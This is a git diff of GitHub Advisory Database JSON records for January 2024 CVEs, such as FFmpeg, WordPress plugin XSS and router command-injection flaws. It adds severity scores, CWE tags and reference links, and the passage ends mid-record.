a/advisories/unreviewed/2024/01/GHSA-44vq-656c-r27f/GHSA-44vq-656c-r27f.json b/advisories/unreviewed/2024/01/GHSA-44vq-656c-r27f/GHSA-44vq-656c-r27f.json index 0dc2da8df3f62..308cbb7b6ae45 100644 --- a/advisories/unreviewed/2024/01/GHSA-44vq-656c-r27f/GHSA-44vq-656c-r27f.json +++ b/advisories/unreviewed/2024/01/GHSA-44vq-656c-r27f/GHSA-44vq-656c-r27f.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-44vq-656c-r27f", - "modified": "2024-01-27T06:30:23Z", + "modified": "2024-02-03T00:31:32Z", "published": "2024-01-27T06:30:23Z", "aliases": [ "CVE-2024-22862" ], "details": "Integer overflow vulnerability in FFmpeg before n6.1, allows remote attackers to execute arbitrary code via the JJPEG XL Parser.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-190" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-27T06:15:48Z" diff --git a/advisories/unreviewed/2024/01/GHSA-45pc-2866-5hxx/GHSA-45pc-2866-5hxx.json b/advisories/unreviewed/2024/01/GHSA-45pc-2866-5hxx/GHSA-45pc-2866-5hxx.json index 6e8b4dc3779a8..ed61e4ef5ab1a 100644 --- a/advisories/unreviewed/2024/01/GHSA-45pc-2866-5hxx/GHSA-45pc-2866-5hxx.json +++ b/advisories/unreviewed/2024/01/GHSA-45pc-2866-5hxx/GHSA-45pc-2866-5hxx.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20918" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00023.html" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0002/" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2024.html" diff --git a/advisories/unreviewed/2024/01/GHSA-4624-w8j8-pr46/GHSA-4624-w8j8-pr46.json b/advisories/unreviewed/2024/01/GHSA-4624-w8j8-pr46/GHSA-4624-w8j8-pr46.json index ac5b0f402a4ea..edb8ca1d44d55 100644 --- a/advisories/unreviewed/2024/01/GHSA-4624-w8j8-pr46/GHSA-4624-w8j8-pr46.json +++ b/advisories/unreviewed/2024/01/GHSA-4624-w8j8-pr46/GHSA-4624-w8j8-pr46.json @@ -28,7 +28,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-131" + "CWE-131", + "CWE-787" ], "severity": "CRITICAL", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-46g9-6366-qgqc/GHSA-46g9-6366-qgqc.json b/advisories/unreviewed/2024/01/GHSA-46g9-6366-qgqc/GHSA-46g9-6366-qgqc.json index 5654b28cf5698..55396aaef9fcc 100644 --- a/advisories/unreviewed/2024/01/GHSA-46g9-6366-qgqc/GHSA-46g9-6366-qgqc.json +++ b/advisories/unreviewed/2024/01/GHSA-46g9-6366-qgqc/GHSA-46g9-6366-qgqc.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-46g9-6366-qgqc", - "modified": "2024-01-23T03:31:08Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T03:31:08Z", "aliases": [ "CVE-2024-23211" ], "details": "A privacy issue was addressed with improved handling of user preferences. This issue is fixed in watchOS 10.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. A user's private browsing activity may be visible in Settings.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" + } ], "affected": [ @@ -63,7 +66,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T01:15:11Z" diff --git a/advisories/unreviewed/2024/01/GHSA-4723-qmx5-q5h4/GHSA-4723-qmx5-q5h4.json b/advisories/unreviewed/2024/01/GHSA-4723-qmx5-q5h4/GHSA-4723-qmx5-q5h4.json index 1635fc9843793..bb97d7e92560d 100644 --- a/advisories/unreviewed/2024/01/GHSA-4723-qmx5-q5h4/GHSA-4723-qmx5-q5h4.json +++ b/advisories/unreviewed/2024/01/GHSA-4723-qmx5-q5h4/GHSA-4723-qmx5-q5h4.json @@ -28,6 +28,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-120", "CWE-131" ], "severity": "CRITICAL", diff --git a/advisories/unreviewed/2024/01/GHSA-47g8-q2w5-x9jm/GHSA-47g8-q2w5-x9jm.json b/advisories/unreviewed/2024/01/GHSA-47g8-q2w5-x9jm/GHSA-47g8-q2w5-x9jm.json index 5f8df2b5c91da..1757d7d138aa2 100644 --- a/advisories/unreviewed/2024/01/GHSA-47g8-q2w5-x9jm/GHSA-47g8-q2w5-x9jm.json +++ b/advisories/unreviewed/2024/01/GHSA-47g8-q2w5-x9jm/GHSA-47g8-q2w5-x9jm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-47g8-q2w5-x9jm", - "modified": "2024-01-25T03:30:59Z", + "modified": "2024-01-31T21:31:03Z", "published": "2024-01-25T03:30:59Z", "aliases": [ "CVE-2024-0624" @@ -36,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-352" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-4957-7vhp-7v59/GHSA-4957-7vhp-7v59.json b/advisories/unreviewed/2024/01/GHSA-4957-7vhp-7v59/GHSA-4957-7vhp-7v59.json deleted file mode 100644 index 7dc5362e0108c..0000000000000 --- a/advisories/unreviewed/2024/01/GHSA-4957-7vhp-7v59/GHSA-4957-7vhp-7v59.json +++ /dev/null @@ -1,50 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-4957-7vhp-7v59", - "modified": "2024-01-26T18:30:34Z", - "published": "2024-01-26T18:30:34Z", - "aliases": [ - "CVE-2024-0937" - ], - "details": "A vulnerability, which was classified as critical, has been found in van_der_Schaar LAB synthcity 0.2.9. Affected by this issue is the function load_from_file of the component PKL File Handler. The manipulation leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252182 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early and confirmed immediately the existence of the issue. A patch is planned to be released in February 2024.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0937" - }, - { - "type": "WEB", - "url": "https://github.com/bayuncao/vul-cve-6" - }, - { - "type": "WEB", - "url": "https://github.com/bayuncao/vul-cve-6/blob/main/poc.py" - }, - { - "type": "WEB", - "url": "https://vuldb.com/?ctiid.252182" - }, - { - "type": "WEB", - "url": "https://vuldb.com/?id.252182" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-502" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2024-01-26T18:15:10Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-4c27-r897-v3m2/GHSA-4c27-r897-v3m2.json b/advisories/unreviewed/2024/01/GHSA-4c27-r897-v3m2/GHSA-4c27-r897-v3m2.json new file mode 100644 index 0000000000000..89c02cc94f0e5 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-4c27-r897-v3m2/GHSA-4c27-r897-v3m2.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4c27-r897-v3m2", + "modified": "2024-01-31T18:31:27Z", + "published": "2024-01-31T18:31:27Z", + "aliases": [ + "CVE-2024-22282" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Michael Torbert SimpleMap Store Locator allows Reflected XSS.This issue affects SimpleMap Store Locator: from n/a through 2.6.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22282" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/simplemap/wordpress-simplemap-store-locator-plugin-2-6-1-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T18:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-4c3x-wrfg-6pjr/GHSA-4c3x-wrfg-6pjr.json b/advisories/unreviewed/2024/01/GHSA-4c3x-wrfg-6pjr/GHSA-4c3x-wrfg-6pjr.json new file mode 100644 index 0000000000000..3962af7e6304a --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-4c3x-wrfg-6pjr/GHSA-4c3x-wrfg-6pjr.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4c3x-wrfg-6pjr", + "modified": "2024-02-06T21:30:25Z", + "published": "2024-01-31T03:30:30Z", + "aliases": [ + "CVE-2023-31505" + ], + "details": "An arbitrary file upload vulnerability in Schlix CMS v2.2.8-1, allows remote authenticated attackers to execute arbitrary code and obtain sensitive information via a crafted .phtml file.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31505" + }, + { + "type": "WEB", + "url": "https://m3n0sd0n4ld.github.io/patoHackventuras/cve-2023-31505" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-4gfv-m8hr-53f2/GHSA-4gfv-m8hr-53f2.json b/advisories/unreviewed/2024/01/GHSA-4gfv-m8hr-53f2/GHSA-4gfv-m8hr-53f2.json new file mode 100644 index 0000000000000..f147694583d51 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-4gfv-m8hr-53f2/GHSA-4gfv-m8hr-53f2.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4gfv-m8hr-53f2", + "modified": "2024-01-30T06:30:23Z", + "published": "2024-01-30T06:30:23Z", + "aliases": [ + "CVE-2023-45926" + ], + "details": "Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45926" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T06:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-4gqf-q3p9-g947/GHSA-4gqf-q3p9-g947.json b/advisories/unreviewed/2024/01/GHSA-4gqf-q3p9-g947/GHSA-4gqf-q3p9-g947.json index 3ba7aec067f83..16cbe62074c86 100644 --- a/advisories/unreviewed/2024/01/GHSA-4gqf-q3p9-g947/GHSA-4gqf-q3p9-g947.json +++ b/advisories/unreviewed/2024/01/GHSA-4gqf-q3p9-g947/GHSA-4gqf-q3p9-g947.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-4gqf-q3p9-g947", - "modified": "2024-01-25T21:32:15Z", + "modified": "2024-01-29T18:31:48Z", "published": "2024-01-25T21:32:15Z", "aliases": [ "CVE-2024-22639" ], "details": "iGalerie v3.0.22 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Titre (Title) field in the editing interface.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-4gx8-mxrj-5rc3/GHSA-4gx8-mxrj-5rc3.json b/advisories/unreviewed/2024/01/GHSA-4gx8-mxrj-5rc3/GHSA-4gx8-mxrj-5rc3.json new file mode 100644 index 0000000000000..36b69997c62b1 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-4gx8-mxrj-5rc3/GHSA-4gx8-mxrj-5rc3.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4gx8-mxrj-5rc3", + "modified": "2024-01-30T06:30:23Z", + "published": "2024-01-30T06:30:23Z", + "aliases": [ + "CVE-2023-45930" + ], + "details": "Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45930" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T06:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-4h85-vpxq-834q/GHSA-4h85-vpxq-834q.json b/advisories/unreviewed/2024/01/GHSA-4h85-vpxq-834q/GHSA-4h85-vpxq-834q.json new file mode 100644 index 0000000000000..f8735ca6fc6d6 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-4h85-vpxq-834q/GHSA-4h85-vpxq-834q.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4h85-vpxq-834q", + "modified": "2024-01-29T12:30:20Z", + "published": "2024-01-29T12:30:20Z", + "aliases": [ + "CVE-2024-23792" + ], + "details": "When adding attachments to ticket comments, \nanother user can add attachments as well impersonating the orginal user. The attack requires a \nlogged-in other user to know the UUID. While the legitimate user \ncompletes the comment, the malicious user can add more files to the \ncomment.\n\nThis issue affects OTRS: from 7.0.X through 7.0.48, from 8.0.X through 8.0.37, from 2023.X through 2023.1.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23792" + }, + { + "type": "WEB", + "url": "https://otrs.com/release-notes/otrs-security-advisory-2024-03/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-4hh7-5c39-pfhw/GHSA-4hh7-5c39-pfhw.json b/advisories/unreviewed/2024/01/GHSA-4hh7-5c39-pfhw/GHSA-4hh7-5c39-pfhw.json index 43126d49c6dad..9839c6aed876d 100644 --- a/advisories/unreviewed/2024/01/GHSA-4hh7-5c39-pfhw/GHSA-4hh7-5c39-pfhw.json +++ b/advisories/unreviewed/2024/01/GHSA-4hh7-5c39-pfhw/GHSA-4hh7-5c39-pfhw.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-4hh7-5c39-pfhw", - "modified": "2024-01-22T21:31:07Z", + "modified": "2024-01-29T18:31:47Z", "published": "2024-01-22T21:31:07Z", "aliases": [ "CVE-2023-24135" ], "details": "Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a command injection vulnerability in the function formWriteFacMac. This vulnerability allows attackers to execute arbitrary commands via manipulation of the mac parameter.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,9 +40,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-77" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-22T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-4j85-8vqx-f8qv/GHSA-4j85-8vqx-f8qv.json b/advisories/unreviewed/2024/01/GHSA-4j85-8vqx-f8qv/GHSA-4j85-8vqx-f8qv.json index 1b4d9e884f20c..79b9c738d755a 100644 --- a/advisories/unreviewed/2024/01/GHSA-4j85-8vqx-f8qv/GHSA-4j85-8vqx-f8qv.json +++ b/advisories/unreviewed/2024/01/GHSA-4j85-8vqx-f8qv/GHSA-4j85-8vqx-f8qv.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20965" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0003/" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0006/" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2024.html" diff --git a/advisories/unreviewed/2024/01/GHSA-4jhj-g9wr-f89q/GHSA-4jhj-g9wr-f89q.json b/advisories/unreviewed/2024/01/GHSA-4jhj-g9wr-f89q/GHSA-4jhj-g9wr-f89q.json index f3e59993c556d..8f4085ddef5b8 100644 --- a/advisories/unreviewed/2024/01/GHSA-4jhj-g9wr-f89q/GHSA-4jhj-g9wr-f89q.json +++ b/advisories/unreviewed/2024/01/GHSA-4jhj-g9wr-f89q/GHSA-4jhj-g9wr-f89q.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-4jhj-g9wr-f89q", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-29T18:31:48Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-52328" ], "details": "Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers.\n\nPlease note this vulnerability is similar, but not identical to CVE-2023-52329.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-4mwf-4888-4x35/GHSA-4mwf-4888-4x35.json b/advisories/unreviewed/2024/01/GHSA-4mwf-4888-4x35/GHSA-4mwf-4888-4x35.json index 9a2cf54464331..1ace89e379607 100644 --- a/advisories/unreviewed/2024/01/GHSA-4mwf-4888-4x35/GHSA-4mwf-4888-4x35.json +++ b/advisories/unreviewed/2024/01/GHSA-4mwf-4888-4x35/GHSA-4mwf-4888-4x35.json @@ -36,6 +36,46 @@ { "type": "WEB", "url": "https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1031" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/30/10" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/30/3" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/30/4" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/30/5" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/30/9" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/31/2" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/31/3" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/02/6" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/02/9" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/03/1" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-4pwh-g75g-82fx/GHSA-4pwh-g75g-82fx.json b/advisories/unreviewed/2024/01/GHSA-4pwh-g75g-82fx/GHSA-4pwh-g75g-82fx.json new file mode 100644 index 0000000000000..108a14de9e218 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-4pwh-g75g-82fx/GHSA-4pwh-g75g-82fx.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4pwh-g75g-82fx", + "modified": "2024-02-06T15:32:04Z", + "published": "2024-01-31T18:31:27Z", + "aliases": [ + "CVE-2024-22286" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Aluka BA Plus – Before & After Image Slider FREE allows Reflected XSS.This issue affects BA Plus – Before & After Image Slider FREE: from n/a through 1.0.3.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22286" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/ba-plus-before-after-image-slider-free/wordpress-ba-plus-plugin-1-0-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T18:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-4q7q-5p3p-5fcj/GHSA-4q7q-5p3p-5fcj.json b/advisories/unreviewed/2024/01/GHSA-4q7q-5p3p-5fcj/GHSA-4q7q-5p3p-5fcj.json new file mode 100644 index 0000000000000..dafb250b8b03e --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-4q7q-5p3p-5fcj/GHSA-4q7q-5p3p-5fcj.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4q7q-5p3p-5fcj", + "modified": "2024-02-01T06:31:05Z", + "published": "2024-01-30T15:30:23Z", + "aliases": [ + "CVE-2024-24328" + ], + "details": "TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setMacFilterRules function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24328" + }, + { + "type": "WEB", + "url": "https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/12/TOTOlink%20A3300R%20setMacFilterRules.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-4q7q-6wxm-5v68/GHSA-4q7q-6wxm-5v68.json b/advisories/unreviewed/2024/01/GHSA-4q7q-6wxm-5v68/GHSA-4q7q-6wxm-5v68.json index 557589f79d1f4..1c7f4394fdc9d 100644 --- a/advisories/unreviewed/2024/01/GHSA-4q7q-6wxm-5v68/GHSA-4q7q-6wxm-5v68.json +++ b/advisories/unreviewed/2024/01/GHSA-4q7q-6wxm-5v68/GHSA-4q7q-6wxm-5v68.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-4q7q-6wxm-5v68", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-31T18:31:23Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-42143" ], "details": "Missing Integrity Check in Shelly TRV 20220811-152343/v2.1.8@5afc928c allows malicious users to create a backdoor by redirecting the device to an attacker-controlled machine which serves the manipulated firmware file. The device is updated with the manipulated firmware.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-354" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T20:15:45Z" diff --git a/advisories/unreviewed/2024/01/GHSA-4q9c-68c7-fxff/GHSA-4q9c-68c7-fxff.json b/advisories/unreviewed/2024/01/GHSA-4q9c-68c7-fxff/GHSA-4q9c-68c7-fxff.json new file mode 100644 index 0000000000000..324120bdd3791 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-4q9c-68c7-fxff/GHSA-4q9c-68c7-fxff.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4q9c-68c7-fxff", + "modified": "2024-02-01T06:31:05Z", + "published": "2024-01-30T15:30:23Z", + "aliases": [ + "CVE-2024-24327" + ], + "details": "TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the pppoePass parameter in the setIpv6Cfg function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24327" + }, + { + "type": "WEB", + "url": "https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/7/TOTOlink%20A3300R%20setIpv6Cfg.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-4qcw-hfhw-j23m/GHSA-4qcw-hfhw-j23m.json b/advisories/unreviewed/2024/01/GHSA-4qcw-hfhw-j23m/GHSA-4qcw-hfhw-j23m.json new file mode 100644 index 0000000000000..8170ce400493e --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-4qcw-hfhw-j23m/GHSA-4qcw-hfhw-j23m.json @@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4qcw-hfhw-j23m", + "modified": "2024-01-29T03:30:18Z", + "published": "2024-01-29T03:30:18Z", + "aliases": [ + "CVE-2024-0996" + ], + "details": "A vulnerability classified as critical has been found in Tenda i9 1.0.0.9(4122). This affects the function formSetCfm of the file /goform/setcfm of the component httpd. The manipulation of the argument funcpara1 leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252261 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0996" + }, + { + "type": "WEB", + "url": "https://jylsec.notion.site/Tenda-i9-has-stack-buffer-overflow-vulnerability-in-formSetCfm-c1bd9745c81e4207aceeaa1ba5e10563?pvs=4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252261" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252261" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121", + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T03:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-4vvr-gjmg-w366/GHSA-4vvr-gjmg-w366.json b/advisories/unreviewed/2024/01/GHSA-4vvr-gjmg-w366/GHSA-4vvr-gjmg-w366.json new file mode 100644 index 0000000000000..a2819fc7cda36 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-4vvr-gjmg-w366/GHSA-4vvr-gjmg-w366.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4vvr-gjmg-w366", + "modified": "2024-01-31T18:31:27Z", + "published": "2024-01-31T18:31:27Z", + "aliases": [ + "CVE-2024-22297" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Codeboxr CBX Map for Google Map & OpenStreetMap allows Stored XSS.This issue affects CBX Map for Google Map & OpenStreetMap: from n/a through 1.1.11.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22297" + }, + { + "type": "WEB", + "url": 